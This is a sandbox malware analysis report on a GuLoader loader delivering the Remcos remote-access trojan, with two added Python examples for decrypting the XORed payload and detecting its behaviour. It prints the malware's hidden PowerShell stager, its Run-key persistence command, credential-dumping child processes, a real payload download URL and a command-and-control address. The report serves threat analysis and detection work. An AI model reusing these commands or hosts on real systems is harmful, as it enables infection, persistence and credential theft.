
Windows Analysis Report
SDWLLRJcsY.exe

Overview

General Information

Sample name: SDWLLRJcsY.exe (renamed because the original name is a hash value)
Original sample name: 7bd1cce43f6b48c8ddd492e5711fd17f.exe
Analysis ID: 1518329
MD5: 7bd1cce43f6b48c8ddd492e5711fd17f
SHA1: 3f650d8993c542682aa61c725ea1bb4ee93d259a
SHA256: c5636797b8bad3e9ff18f51d269ace0948112d9ff03a9900a174687fec4bae3b
Tags: exe, GuLoader, RAT, RemcosRAT, user-abuse_ch

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Powershell drops PE file
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • SDWLLRJcsY.exe (PID: 6856 cmdline: "C:\Users\user\Desktop\SDWLLRJcsY.exe" MD5: 7BD1CCE43F6B48C8DDD492E5711FD17F)
    • powershell.exe (PID: 6940 cmdline: "powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conspect124.exe (PID: 1800 cmdline: "C:\Users\user\AppData\Local\Temp\Conspect124.exe" MD5: 7BD1CCE43F6B48C8DDD492E5711FD17F)
        • cmd.exe (PID: 1988 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 3672 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • Conspect124.exe (PID: 5840 cmdline: C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\llsemopjpzfqlbiqwdrulxfexi" MD5: 7BD1CCE43F6B48C8DDD492E5711FD17F)
        • Conspect124.exe (PID: 6520 cmdline: C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\vnfxngzclhxvohwunodvwkzvgosxx" MD5: 7BD1CCE43F6B48C8DDD492E5711FD17F)
        • Conspect124.exe (PID: 3140 cmdline: C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\fhlpgzkezppayvsywzqpzpmegvkgywqb" MD5: 7BD1CCE43F6B48C8DDD492E5711FD17F)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
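The Malpedia entry above says only that the downloaded payload is XORed. The block below is an added example, not code from this report or from the Malpedia or GuLoader authors: it shows the generic known-plaintext approach an analyst tries first on such a download (here the eODGqfP132.bin fetched from cmgtrading.eu), recovering a repeating XOR key from the standard MS-DOS header and stub that an MSVC-linked PE starts with, then confirming the key by checking for the PE signature at the decrypted e_lfanew. It assumes a single repeating key and an unmodified DOS header; whether a particular GuLoader build encrypts its payload that simply is an assumption here, not something the report establishes. The encrypted blob and its 13-byte key are constructed inside the block.

```python
import struct
from typing import Dict, Optional, Tuple

# Known plaintext: the first 0x3C bytes of the MS-DOS header shared by MSVC-linked PEs
# (e_lfanew at 0x3C..0x3F varies per binary and is deliberately left out) and the standard
# DOS stub that starts at offset 0x40.
DOS_HEADER_60 = bytes.fromhex("4d5a90000300000004000000ffff0000" "b80000000000000040000000") + b"\x00" * 32
DOS_STUB = bytes.fromhex("0e1fba0e00b409cd21b8014ccd21") + b"This program cannot be run in DOS mode.\r\r\n$"


def known_plaintext() -> Dict[int, int]:
    """Map file offset -> expected plaintext byte for the bytes we are willing to assume."""
    known = {off: b for off, b in enumerate(DOS_HEADER_60)}
    known.update({0x40 + off: b for off, b in enumerate(DOS_STUB)})
    return known


def xor(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(ct: bytes, key_len: int, known: Dict[int, int]) -> Optional[bytes]:
    """Derive a repeating key of key_len bytes from the known plaintext positions.

    Every known offset fixes key[offset % key_len]; a contradiction means key_len is wrong
    (or the plaintext assumption does not hold), an unfixed slot means too little known text.
    """
    key = [-1] * key_len
    for off, pt in known.items():
        if off >= len(ct):
            continue
        slot, k = off % key_len, ct[off] ^ pt
        if key[slot] == -1:
            key[slot] = k
        elif key[slot] != k:
            return None
    return None if -1 in key else bytes(key)


def looks_like_pe(data: bytes) -> bool:
    """MZ at offset 0 and the PE signature at e_lfanew: the check that a candidate key worked."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def decrypt_payload(ct: bytes, max_key_len: int = 60) -> Optional[Tuple[bytes, bytes]]:
    """Try key lengths 1..max_key_len; return (key, plaintext) for the shortest that yields a PE.

    60 is the longest key the known bytes fully determine (offsets 0..0x3B are contiguous);
    longer keys need more known plaintext, e.g. a Rich header or section names.
    """
    known = known_plaintext()
    for key_len in range(1, max_key_len + 1):
        key = recover_key(ct, key_len, known)
        if key is not None:
            pt = xor(ct, key)
            if looks_like_pe(pt):
                return key, pt
    return None


def build_sample() -> Tuple[bytes, bytes]:
    """Constructed stand-in for a downloaded payload: a headers-only PE shape XORed with a 13-byte key."""
    e_lfanew = 0x80
    pe = DOS_HEADER_60 + struct.pack("<I", e_lfanew) + DOS_STUB
    pe += b"\x00" * (e_lfanew - len(pe))                                  # pad up to the NT headers
    pe += b"PE\x00\x00" + struct.pack("<HH", 0x014C, 3) + b"\x00" * 40   # start of IMAGE_FILE_HEADER, filler
    key = bytes.fromhex("5a13f07721c39e0844ab6d1fe5")
    return key, xor(pe, key)


if __name__ == "__main__":
    true_key, blob = build_sample()
    result = decrypt_payload(blob)
    assert result is not None and result[0] == true_key
    print("recovered key:", result[0].hex(), "| PE signature at e_lfanew:", looks_like_pe(result[1]))
```

If no key length up to 60 validates, the payload is either not a plain repeating-key XOR or its DOS header was altered before encryption; in that case extend known_plaintext() with bytes you can read from the loader itself (a section name, a Rich header) rather than raising max_key_len blindly.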
No configs have been found
Source | Rule | Description | Author
00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000007.00000002.4164316421.0000000006F06000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000001.00000002.3181422671.000000000B5DE000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
(1 further entry not included in this export)

System Summary

Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data: Details: %Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 3672, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key

Source: Process started
Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community
Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1988, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)", ProcessId: 3672, ProcessName: reg.exe

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Conspect124.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Conspect124.exe, ParentProcessId: 1800, ParentProcessName: Conspect124.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)", ProcessId: 1988, ProcessName: cmd.exe

Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: Command: "powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)", CommandLine: "powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SDWLLRJcsY.exe", ParentImage: C:\Users\user\Desktop\SDWLLRJcsY.exe, ParentProcessId: 6856, ParentProcessName: SDWLLRJcsY.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)", ProcessId: 6940, ProcessName: powershell.exe
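The Sigma matches above fire on two command lines from the process tree: powershell.exe reading a dropped data file and dot-invoking a three-character substring of it, and cmd.exe/reg.exe writing a REG_EXPAND_SZ Run value whose data starts with an environment variable and pulls its script body out of HKCU:\Forseglingens\Drenching. The block below is an added example, not code from the report or from Joe Security: a small Python hunt that runs four rules of this kind over process-creation and registry-set events constructed from the report (plus one constructed benign Run value as a control). The event dict shape and the rule names are this example's own; the reading of SubString(57477,3) as most likely yielding the Invoke-Expression alias is an assumption (the report does not show Papyr.paa); the Rmc-<six characters> key name in the last rule is the Remcos default mutex name, taken from the HKCU\SOFTWARE\Rmc-DSGECX\exepath write recorded further down this report; and the /stext rule rests on the NirSoft "save as text" switch visible in the three Conspect124.exe children, which matches the nirsoft.net string the report finds in the binary.

```python
import ntpath
import re
from typing import Dict, List, Optional, Tuple

Event = Dict[str, object]

# Constructed events modelled on the process tree and Sigma matches in this report. The dict
# shape is this example's own; command lines, PIDs, images and the registry key are the report's.
EVENTS: List[Event] = [
    {"type": "process", "pid": 6940, "parent_image": r"C:\Users\user\Desktop\SDWLLRJcsY.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": (r'"powershell.exe" -windowstyle hidden "$Headcloths=Get-Content '
             r"'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';"
             r'$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)"')},
    {"type": "process", "pid": 3672, "parent_image": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Windows\SysWOW64\reg.exe",
     "cmd": (r'REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" '
             r'/t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized '
             r"$Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;"
             r'%Begunstigelses% ($Hjtryksryg)"')},
    {"type": "process", "pid": 5840, "parent_image": r"C:\Users\user\AppData\Local\Temp\Conspect124.exe",
     "image": r"C:\Users\user\AppData\Local\Temp\Conspect124.exe",
     "cmd": r'C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\llsemopjpzfqlbiqwdrulxfexi"'},
    {"type": "registry", "pid": 1800, "image": r"C:\Users\user\AppData\Local\Temp\Conspect124.exe",
     "key": r"HKEY_CURRENT_USER\SOFTWARE\Rmc-DSGECX\exepath",
     "data": "00 21 BC BC 23 53 AA E8 94 9B E0 2A 08 D0 4B 56"},
    # Constructed benign control: an installer writing a plain REG_SZ Run value.
    {"type": "process", "pid": 4242, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmd": (r'REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ '
             r'/d "C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"')},
]

# Rule 1: the stager reads a data file, cuts a 1..3 character token out of it with
# SubString(offset, len) and invokes that token with the dot or call operator on the file's
# text. The rule keys on that shape, not on the word "iex", because the token lives in the file.
STAGER_RE = re.compile(
    r"Get-Content\b[^;]*;\s*\$(?P<var>\w+)\s*=\s*\$\w+\.SubString\(\s*\d+\s*,\s*[1-3]\s*\)\s*;"
    r"\s*[.&]\s*\$(?P=var)\s*\(", re.IGNORECASE)
# Rules 2 and 3: reg.exe writing a Run value whose data hides the interpreter behind %ENVVAR%
# followed by PowerShell switches, or fetches its script from another registry value.
RUN_KEY_RE = re.compile(
    r"(?i)\bREG\s+ADD\s+\"?(HKCU|HKEY_CURRENT_USER|HKLM|HKEY_LOCAL_MACHINE)"
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\b")
ENV_PREFIX_RE = re.compile(r"^\s*%\w+%\s")
PS_SWITCH_RE = re.compile(r"(?i)\s-(windowstyle|w|nop|noprofile|noni|ep|executionpolicy|enc|encodedcommand|c|command)\b")
REG_SCRIPT_RE = re.compile(r"(?i)Get-ItemProperty\s+-Path\s+'?HK(CU|LM):\\")
# Rule 4: a process re-launching its own image with the NirSoft-style '/stext <file>' switch.
STEXT_RE = re.compile(r'(?i)\s/stext\s+"[^"]+"')
# Rule 5: Remcos stores its install path under HKCU\SOFTWARE\<mutex>\exepath; 'Rmc-' plus six
# alphanumerics is the default mutex name (assumption for builds with a custom name).
REMCOS_EXEPATH_RE = re.compile(r"(?i)^HKEY_CURRENT_USER\\SOFTWARE\\Rmc-[A-Z0-9]{6}\\exepath$")


def parse_reg_add(cmd: str) -> Optional[Dict[str, str]]:
    """Name, type and data of a 'REG ADD <Run key> ... /v N /t T /d D' command line, else None."""
    if not RUN_KEY_RE.search(cmd):
        return None

    def arg(flag: str) -> str:
        m = re.search(rf'\s/{flag}\s+(?:"([^"]*)"|(\S+))', cmd, re.IGNORECASE)
        return "" if m is None else (m.group(1) if m.group(1) is not None else m.group(2))

    return {"name": arg("v"), "type": arg("t").upper(), "data": arg("d")}


def check_process(ev: Event) -> List[str]:
    hits: List[str] = []
    cmd = str(ev["cmd"])
    exe = ntpath.basename(str(ev["image"])).lower()
    parent_exe = ntpath.basename(str(ev.get("parent_image", ""))).lower()
    if exe == "powershell.exe" and STAGER_RE.search(cmd):
        hits.append("powershell_stager_dot_invoke")
    value = parse_reg_add(cmd)
    if value is not None:
        if (value["type"] == "REG_EXPAND_SZ" and ENV_PREFIX_RE.match(value["data"])
                and PS_SWITCH_RE.search(value["data"])):
            hits.append("run_key_envvar_powershell")
        if REG_SCRIPT_RE.search(value["data"]):
            hits.append("run_key_script_from_registry")
    if exe == parent_exe and STEXT_RE.search(cmd):
        hits.append("self_spawn_stext_credential_dump")
    return hits


def check_registry(ev: Event) -> List[str]:
    return ["remcos_exepath_value"] if REMCOS_EXEPATH_RE.match(str(ev["key"])) else []


def hunt(events: List[Event]) -> List[Tuple[int, str]]:
    """Run every rule over the events and return (pid, rule name) pairs."""
    out: List[Tuple[int, str]] = []
    for ev in events:
        names = check_process(ev) if ev["type"] == "process" else check_registry(ev)
        out.extend((int(str(ev["pid"])), n) for n in names)
    return out


if __name__ == "__main__":
    for pid, rule in hunt(EVENTS):
        print(f"pid {pid}: {rule}")
```

The Run-key rules deliberately parse /v, /t and /d instead of grepping the whole line: the REG_EXPAND_SZ type is what lets %Begunstigelses% be expanded at logon, so the type and the leading environment variable together are the signal, and a plain REG_SZ value pointing at an executable (the control event) must not fire.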

Stealing of Sensitive Information

Source: Registry Key set
Author: Joe Security
Data: Details: 00 21 BC BC 23 53 AA E8 94 9B E0 2A 08 D0 4B 56 C2 2F 8B 12 99 DA 07 CC 62 71 73 68 10 B5 BD 45 F4 15 E9 3D C8 20 16 66 6D 76 69 D1 DF 18 78 66 41 03 C0 AD 59 C2 23 8D A4 8B 34 7D 13 60 30 49 C4 1E C3 B2 0C 6C E7 38 B7 4F 74 98 AB 7C AC 6C 10 CE EE 31 AE 4D DF 7C 00 F5 B8 3C AD 78 E7 25 85 10 7A 93, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Conspect124.exe, ProcessId: 1800, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-DSGECX\exepath

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T16:01:30.828582+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 64860 | 107.173.4.16 | 2404 | TCP
2024-09-25T16:01:32.094273+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 64862 | 107.173.4.16 | 2404 | TCP
2024-09-25T16:01:32.079186+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 64861 | 178.237.33.50 | 80 | TCP
2024-09-25T16:01:27.983317+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 64858 | 185.26.107.57 | 80 | TCP

AV Detection

Source: https://cmgtrading.eu/eODGqfP132.bin | Avira URL Cloud: Label: malware
Source: http://cmgtrading.eu/eODGqfP132.bin | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | ReversingLabs: Detection: 13%
Source: SDWLLRJcsY.exe | ReversingLabs: Detection: 13%
Source: Yara match | File source: 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4164316421.0000000006F06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Conspect124.exe PID: 1800, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData | 11_2_00404423
Source: SDWLLRJcsY.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 185.26.107.57:443 -> 192.168.2.4:64859 version: TLS 1.2
Source: SDWLLRJcsY.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbr | source: powershell.exe, 00000001.00000002.3164322677.0000000002889000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ore.pdbK | source: powershell.exe, 00000001.00000002.3172185585.00000000072D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bqm.Core.pdb | source: powershell.exe, 00000001.00000002.3172185585.00000000072D0000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Code function: 0_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 0_2_0040595A
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Code function: 0_2_00402862 FindFirstFileW | 0_2_00402862
Source: C:\Users\user\Desktop\SDWLLRJcsY.exe | Code function: 0_2_0040658F FindFirstFileW,FindClose | 0_2_0040658F
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 7_2_0040595A
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_00402862 FindFirstFileW | 7_2_00402862
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_0040658F FindFirstFileW,FindClose | 7_2_0040658F
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 7_2_23BC10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 7_2_23BC10F1
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 11_2_0040AE51 FindFirstFileW,FindNextFileW | 11_2_0040AE51
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen | 12_2_00407EF8
Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe | Code function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen | 13_2_00407898
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\intercessionate\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\

Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:64860 -> 107.173.4.16:2404
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:64862 -> 107.173.4.16:2404
Source: global traffic | TCP traffic: 192.168.2.4:64860 -> 107.173.4.16:2404
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 185.26.107.57
Source: Joe Sandbox View | IP Address: 107.173.4.16
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:64861 -> 178.237.33.50:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:64858 -> 185.26.107.57:80
Source: global traffic | HTTP traffic detected: GET /eODGqfP132.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: cmgtrading.eu | Connection: Keep-Alive | Cookie: SERVID=B
